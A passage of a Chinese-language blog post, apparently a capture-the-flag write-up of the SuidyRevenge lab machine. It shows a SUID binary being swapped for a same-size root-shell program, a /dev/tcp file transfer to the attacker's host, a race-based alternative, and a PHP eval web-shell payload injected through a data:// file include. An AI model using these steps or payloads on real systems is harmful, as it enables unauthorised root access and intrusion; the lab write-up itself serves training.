\/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\ntheuser@suidyrevenge:~$ cd ..\/suidy\/\ntheuser@suidyrevenge:\/home\/suidy$ ls -la\ntotal 52\ndrwxrwxr-x 3 suidy suidy    4096 Oct  2  2020 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \nsuidy@suidyrevenge:\/home\/suidy$ whoami;id\nsuidy\nuid=1005(suidy) gid=1004(theuser) groups=1004(theuser)<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u83b7\u53d6root<\/h3>\n<pre><code class=\"language-bash\">suidy@suidyrevenge:\/home\/suidy$ ls -la\ntotal 52\ndrwxrwxr-x 3 suidy suidy    4096 Oct  2  2020 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ cat note.txt \nI know that theuser is not here anymore but suidyyyyy is now more secure!\nroot runs the script as in the past that always gives SUID to suidyyyyy binary\nbut this time also check the size of the file.\nWE DONT WANT MORE &quot;theuser&quot; HERE!.\nWE ARE SECURE NOW.\n\n-suidy\nsuidy@suidyrevenge:\/home\/suidy$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for suidy:<\/code><\/pre>\n<p>\u4f20\u5230\u672c\u5730\u5c1d\u8bd5\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a<code>suidyyyyy<\/code><\/p>\n<pre><code class=\"language-bash\">cat suidyyyyy &gt; \/dev\/tcp\/192.168.0.143\/8888\nnc -lp 8888 &gt; suidyyyyy<\/code><\/pre>\n<p>\u7528ida\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  setuid(0x3EDu);\n  setgid(0x3EDu);\n  system(&quot;\/bin\/bash&quot;);\n  return 0;\n}<\/code><\/pre>\n<p>\u989d\u3002\u3002\u3002\u3002\u6ce8\u610f\u5230\u6587\u4ef6\u6743\u9650\uff0c\u5c1d\u8bd5\u8fdb\u884c\u66ff\u6362\uff0c\u4f46\u662f\u4e0a\u9762\u8bf4\u68c0\u67e5\u5c3a\u5bf8\u4e86\uff0c\u6240\u4ee5\u8981\u751f\u6210\u4e00\u4e2a<code>16712<\/code>\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-c\">#include&lt;stdlib.h&gt;\nint main(void){\n    setuid(0);\n    setgid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>\u8fd9\u4e2a\u5927\u5c0f\u4e3a<code>16056<\/code>\uff0c\u589e\u52a0\u4e00\u70b9\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-c\"># include&lt;stdlib.h&gt;\nint main(void){\n    setuid(0);\n    setgid(0);\n    setuid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>\u4f46\u662f\u4e0d\u7ba1\u7528\uff0c\u7f16\u8bd1\u5668\u4f1a\u81ea\u52a8\u7ed9\u4ed6\u4f18\u5316\u6389\uff0c\u672c\u5730\u7684gcc\u548c\u670d\u52a1\u5668\u4e0a\u7684gcc\u7248\u672c\u8fd8\u4e0d\u4e00\u6837\uff0c\u7f16\u8bd1\u51fa\u6765\u5927\u5c0f\u8fd8\u4e0d\u4e00\u6837\uff0c\u5f97\u7528\u9776\u673a\u6765\u641e<\/p>\n<pre><code class=\"language-bash\">suidy@suidyrevenge:\/home\/suidy$ ls\nnote.txt  suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ vi suid.c\nsuidy@suidyrevenge:\/home\/suidy$ gcc suid.c -o suid\ngcc: error trying to exec &#039;cc1&#039;: execvp: No such file or directory\nsuidy@suidyrevenge:\/home\/suidy$ gcc\ngcc: fatal error: no input files\ncompilation terminated.<\/code><\/pre>\n<p>\u6362\u7528\u6237\u7167\u6837\u62a5\u9519\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">theuser@suidyrevenge:~$ vi exp.c\ntheuser@suidyrevenge:~$ gcc exp.c -o exp\ngcc: error trying to exec &#039;cc1&#039;: execvp: No such file or directory<\/code><\/pre>\n<p>\u89e3\u51b3\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">theuser@suidyrevenge:~$ gcc exp.c -o exp\ngcc: error trying to exec &#039;cc1&#039;: execvp: No such file or directory\ntheuser@suidyrevenge:~$ find \/usr\/ -name &quot;*cc1*&quot;\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/libcc1.so\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/plugin\/libcc1plugin.so.0\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/plugin\/libcc1plugin.so\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/plugin\/libcc1plugin.so.0.0.0\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/cc1\n\/usr\/lib\/x86_64-linux-gnu\/libcc1.so.0\n\/usr\/lib\/x86_64-linux-gnu\/libcc1.so.0.0.0\n\/usr\/share\/doc\/libgcc1\n\/usr\/share\/doc\/libisccc161\n\/usr\/share\/doc\/libcc1-0\n\/usr\/share\/lintian\/overrides\/libgcc1\n\/usr\/share\/terminfo\/x\/xterm+pcc1\ntheuser@suidyrevenge:~$ export PATH=$PATH:\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/\ntheuser@suidyrevenge:~$ gcc exp.c -o exp\nexp.c: In function \u2018main\u2019:\nexp.c:4:5: warning: implicit declaration of function \u2018setuid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n     setuid(0);\n     ^~~~~~\n     setenv\nexp.c:5:5: warning: implicit declaration of function \u2018setgid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n     setgid(0);\n     ^~~~~~\n     setenv\ntheuser@suidyrevenge:~$ ls -la\ntotal 56\ndrwxrwx--- 3 theuser theuser  4096 Apr 18 06:33 .\ndrwxr-xr-x 8 root    root     4096 Oct  1  2020 ..\n-rw------- 1 theuser theuser    33 Oct  2  2020 .bash_history\n-rwxrwx--- 1 theuser theuser   220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 theuser theuser  3526 Oct  1  2020 .bashrc\n-rwxr-xr-x 1 theuser theuser 16712 Apr 18 06:33 exp\n-rw-r--r-- 1 theuser theuser   103 Apr 18 06:31 exp.c\ndrwxr-xr-x 3 theuser theuser  4096 Oct  1  2020 .local\n-rwxrwx--- 1 theuser theuser   807 Oct  1  2020 .profile\n-rw-r----- 1 theuser theuser  1961 Oct  2  2020 user.txt<\/code><\/pre>\n<p>\u8bfa\uff0c\u5927\u5c0f\u4e00\u6837\u4e86\uff0c\u5c1d\u8bd5\u4e22\u8fc7\u53bb\uff0c\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">theuser@suidyrevenge:~$ cd ..\/\ntheuser@suidyrevenge:\/home$ cd suidy\/\ntheuser@suidyrevenge:\/home\/suidy$ cp \/home\/theuser\/exp suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ ls -la\ntotal 56\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:25 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwxrwx--- 1 root  theuser 16712 Apr 18 06:36 suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \ntheuser@suidyrevenge:\/home\/suidy$ ls -la\ntotal 56\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:25 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsrws--- 1 root  theuser 16712 Apr 18 06:36 suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \nroot@suidyrevenge:\/home\/suidy# cd \/root\nroot@suidyrevenge:\/root# ls -la\ntotal 56\ndrwx------  3 root root  4096 Oct  2  2020 .\ndrwxr-xr-x 18 root root  4096 Oct  1  2020 ..\n-rw-------  1 root root   127 Oct  2  2020 .bash_history\n-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root  4096 Oct  1  2020 .local\n-rw-r--r--  1 root root   148 Aug 17  2015 .profile\n-rw-r-----  1 root root  1961 Oct  2  2020 root.txt\n-rwxr-x--x  1 root root   517 Oct  1  2020 script.sh\n-rw-r--r--  1 root root    66 Oct  1  2020 .selected_editor\n-rwxr-xr-x  1 root root 16712 Oct  2  2020 suidyyyyy\nroot@suidyrevenge:\/root# cat script.sh \nFILE=\/home\/suidy\/suidyyyyy\nif [ -f &quot;$FILE&quot; ]; then\necho &quot;&quot;\n        else \n   cp \/root\/suidyyyyy \/home\/suidy\n   chown root:theuser \/home\/suidy\/suidyyyyy\n   chmod 770 \/home\/suidy\/suidyyyyy\n   chmod +s \/home\/suidy\/suidyyyyy\n\nfi\n\nif [ $(stat -c%s \/root\/suidyyyyy) -ne $(stat -c%s \/home\/suidy\/suidyyyyy) ]; then \n   echo &quot;They&#039;re different.&quot;\n   cp \/root\/suidyyyyy \/home\/suidy\n   chown root:theuser \/home\/suidy\/suidyyyyy\n   chmod 770 \/home\/suidy\/suidyyyyy\n   chmod +s \/home\/suidy\/suidyyyyy\nelse\nchmod +s \/home\/suidy\/suidyyyyy\nfi\n\nroot@suidyrevenge:\/root# cat root.txt \n\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,                                      \n\nHMVvoilarootlala<\/code><\/pre>\n<p>\u62ff\u5230flag\uff01\uff01\uff01<\/p>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<h3>\u58a8\u5e08\u5085LFI\u8bfb\u53d6<\/h3>\n<p>\u5728<a href=\"https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/SuidyRevenge\/\">\u58a8\u5e08\u5085\u7684wp<\/a>\u4e2d\u4f7f\u7528file\u534f\u8bae\u8fdb\u884c\u5199\u5165\u6728\u9a6c\uff1a<\/p>\n<pre><code class=\"language-bash\">payload:?file=data:text\/plain,&lt;?php @eval($_POST[&#039;a&#039;]) ?&gt;<\/code><\/pre>\n<p>\u597d\u4e45\u6ca1\u6709\u7528\u4e86\u90fd\u5fd8\u8bb0\u4e86\uff0c\u8bb0\u5f55\u4e00\u4e0b\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846310.jpg'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846310.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7fa4\u4e3b\u89e3\u6cd5<\/h3>\n<p>\u7fa4\u4e3b\u8fd8\u5229\u7528\u547d\u4ee4\u6267\u884c\u7684\u7a7a\u9699\u76f4\u63a5\u5361\u5230rootshell\u4e86\uff0c\u4e5f\u662f\u4e00\u4e2a\u5f88\u725b\u903c\u7684\u89e3\u6cd5\u6211\u5728\u8fd9\u91cc\u6d45\u6d45\u590d\u73b0\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">suidy@suidyrevenge:\/home\/suidy$ vi exploit.c\nsuidy@suidyrevenge:\/home\/suidy$ gcc exploit.c -o exploit\nexploit.c: In function \u2018main\u2019:\nexploit.c:3:5: warning: implicit declaration of function \u2018setuid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n     setuid(0);\n     ^~~~~~\n     setenv\nsuidy@suidyrevenge:\/home\/suidy$ ls -la\ntotal 104\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:43 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:43 exploit\n-rw-r--r-- 1 suidy theuser    77 Apr 18 06:43 exploit.c\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxr-xr-x 1 suidy theuser 16712 Apr 18 06:42 payload\n-rw-r--r-- 1 root  root       92 Apr 18 06:41 payload.c\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsr-sr-x 1 root  root    16712 Apr 18 06:40 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ ls -l exploit\n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:43 exploit\nsuidy@suidyrevenge:\/home\/suidy$ ls -l suidyyyyy \n-rwsr-sr-x 1 root root 16712 Apr 18 06:40 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ cp exploit suidyyyyy \ncp: cannot create regular file &#039;suidyyyyy&#039;: Permission denied\nsuidy@suidyrevenge:\/home\/suidy$ rm suidyyyyy \nrm: remove write-protected regular file &#039;suidyyyyy&#039;? \nsuidy@suidyrevenge:\/home\/suidy$ ls -la\ntotal 104\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:43 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:43 exploit\n-rw-r--r-- 1 suidy theuser    77 Apr 18 06:43 exploit.c\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxr-xr-x 1 suidy theuser 16712 Apr 18 06:42 payload\n-rw-r--r-- 1 root  root       92 Apr 18 06:41 payload.c\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsr-sr-x 1 root  root    16712 Apr 18 06:40 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ rm suidyyyyy \nrm: remove write-protected regular file &#039;suidyyyyy&#039;? y\nsuidy@suidyrevenge:\/home\/suidy$ cp exploit suidyyyyy \nsuidy@suidyrevenge:\/home\/suidy$ ls -l suidyyyyy \n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:44 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \nsuidy@suidyrevenge:\/home\/suidy$ \nsuidy@suidyrevenge:\/home\/suidy$ \nsuidy@suidyrevenge:\/home\/suidy$ \nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nroot@suidyrevenge:\/home\/suidy# .\/suidyyyyy\nroot@suidyrevenge:\/home\/suidy# cat exploit.c \n#include&lt;stdlib.h&gt;\nint main(void){\n    setuid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SuidyRevenge \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.140 &#8212; -A  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-582","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/582","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=582"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/582\/revisions"}],"predecessor-version":[{"id":588,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/582\/revisions\/588"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=582"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=582"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=582"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}